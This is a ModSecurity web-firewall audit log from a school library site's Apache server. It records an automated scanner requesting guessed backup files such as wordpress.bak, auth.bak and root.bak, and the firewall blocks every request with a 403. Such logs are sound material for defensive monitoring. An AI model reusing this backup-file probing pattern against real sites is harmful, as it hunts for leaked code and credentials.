[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227896385 2342 (- - -) Stopwatch2: 1747683227896385 2342; combined=967, p1=478, p2=451, p3=0, p4=0, p5=38, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dd331c-Z-- --37c73057-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oUwAAAE0 103.236.140.4 35018 103.236.140.4 8181 --37c73057-B-- GET /vb.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/60.0.3255.170 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871967 --37c73057-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --37c73057-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227902507 1825 (- - -) Stopwatch2: 1747683227902507 1825; combined=702, p1=347, p2=328, p3=0, p4=0, p5=27, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37c73057-Z-- --2e36762a-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oVAAAAEo 103.236.140.4 35018 103.236.140.4 8181 --2e36762a-B-- GET /wordpress.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700205 --2e36762a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2e36762a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227914303 2458 (- - -) Stopwatch2: 1747683227914303 2458; combined=960, p1=429, p2=496, p3=0, p4=0, p5=35, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e36762a-Z-- --038fc022-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oVgAAAFE 103.236.140.4 35018 103.236.140.4 8181 --038fc022-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530892 --038fc022-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --038fc022-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227926802 1891 (- - -) Stopwatch2: 1747683227926802 1891; combined=648, p1=293, p2=330, p3=0, p4=0, p5=25, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --038fc022-Z-- --6700f02b-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopFwAAABc 103.236.140.4 34924 103.236.140.4 8181 --6700f02b-B-- GET /2021.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182585 --6700f02b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --6700f02b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227927999 1803 (- - -) Stopwatch2: 1747683227927999 1803; combined=626, p1=292, p2=311, p3=0, p4=0, p5=23, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6700f02b-Z-- --cee11b1b-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopHAAAAA0 103.236.140.4 34924 103.236.140.4 8181 --cee11b1b-B-- GET /asp.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871987 --cee11b1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cee11b1b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227940642 2541 (- - -) Stopwatch2: 1747683227940642 2541; combined=767, p1=263, p2=473, p3=0, p4=0, p5=31, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cee11b1b-Z-- --cd004a6c-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oWAAAAEY 103.236.140.4 35018 103.236.140.4 8181 --cd004a6c-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36 OPR/51.0.2830.40 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152633461 --cd004a6c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cd004a6c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227941260 2126 (- - -) Stopwatch2: 1747683227941260 2126; combined=837, p1=427, p2=379, p3=0, p4=0, p5=31, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd004a6c-Z-- --1ad9d82a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopHQAAAAU 103.236.140.4 34924 103.236.140.4 8181 --1ad9d82a-B-- GET /erpustakaan.smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530908 --1ad9d82a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1ad9d82a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".smkn22jakarta.sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227943441 1860 (- - -) Stopwatch2: 1747683227943441 1860; combined=749, p1=329, p2=392, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad9d82a-Z-- --042f664a-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oWgAAAE4 103.236.140.4 35018 103.236.140.4 8181 --042f664a-B-- GET /2020.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152764517 --042f664a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --042f664a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227948625 1548 (- - -) Stopwatch2: 1747683227948625 1548; combined=569, p1=274, p2=271, p3=0, p4=0, p5=24, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --042f664a-Z-- --12e6e838-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oWwAAAFg 103.236.140.4 35018 103.236.140.4 8181 --12e6e838-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871994 --12e6e838-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --12e6e838-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227955409 1590 (- - -) Stopwatch2: 1747683227955409 1590; combined=562, p1=263, p2=276, p3=0, p4=0, p5=23, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12e6e838-Z-- --8373d531-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIopHwAAAAc 103.236.140.4 34924 103.236.140.4 8181 --8373d531-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:66.0.2) Gecko/20100101 Firefox/66.0.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700221 --8373d531-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8373d531-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227955395 1783 (- - -) Stopwatch2: 1747683227955395 1783; combined=546, p1=259, p2=259, p3=0, p4=0, p5=28, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8373d531-Z-- --1b617627-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oXAAAAEM 103.236.140.4 35018 103.236.140.4 8181 --1b617627-B-- GET /2010.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.1.2) Gecko/20100101 Firefox/52.1.2 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871997 --1b617627-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1b617627-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227958023 1580 (- - -) Stopwatch2: 1747683227958023 1580; combined=663, p1=358, p2=279, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b617627-Z-- --eb53f56b-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oXgAAAFI 103.236.140.4 35018 103.236.140.4 8181 --eb53f56b-B-- GET /auth.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 OPR/57.0.3098.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 150700234 --eb53f56b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eb53f56b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227966015 1649 (- - -) Stopwatch2: 1747683227966015 1649; combined=708, p1=384, p2=287, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb53f56b-Z-- --ac30c34a-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oXwAAAEE 103.236.140.4 35018 103.236.140.4 8181 --ac30c34a-B-- GET /index.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:65.0.1) Gecko/20100101 Firefox/65.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 157906317 --ac30c34a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac30c34a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227967965 1550 (- - -) Stopwatch2: 1747683227967965 1550; combined=600, p1=301, p2=273, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac30c34a-Z-- --00ff8d16-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oYAAAAFc 103.236.140.4 35018 103.236.140.4 8181 --00ff8d16-B-- GET /erpustakaan.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805060 --00ff8d16-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --00ff8d16-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227972539 1705 (- - -) Stopwatch2: 1747683227972539 1705; combined=640, p1=308, p2=305, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00ff8d16-Z-- --2c95564b-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oYQAAAFM 103.236.140.4 35018 103.236.140.4 8181 --2c95564b-B-- GET /erpustakaan.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182622 --2c95564b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2c95564b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227976359 1710 (- - -) Stopwatch2: 1747683227976359 1710; combined=679, p1=313, p2=323, p3=0, p4=0, p5=42, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c95564b-Z-- --805c8f75-A-- [20/May/2025:02:33:47 +0700] aCuHmwZaP57SewDBUi9oZAAAAEc 103.236.140.4 35018 103.236.140.4 8181 --805c8f75-B-- GET /2016.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36 OPR/53.0.2907.110 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165872010 --805c8f75-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --805c8f75-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
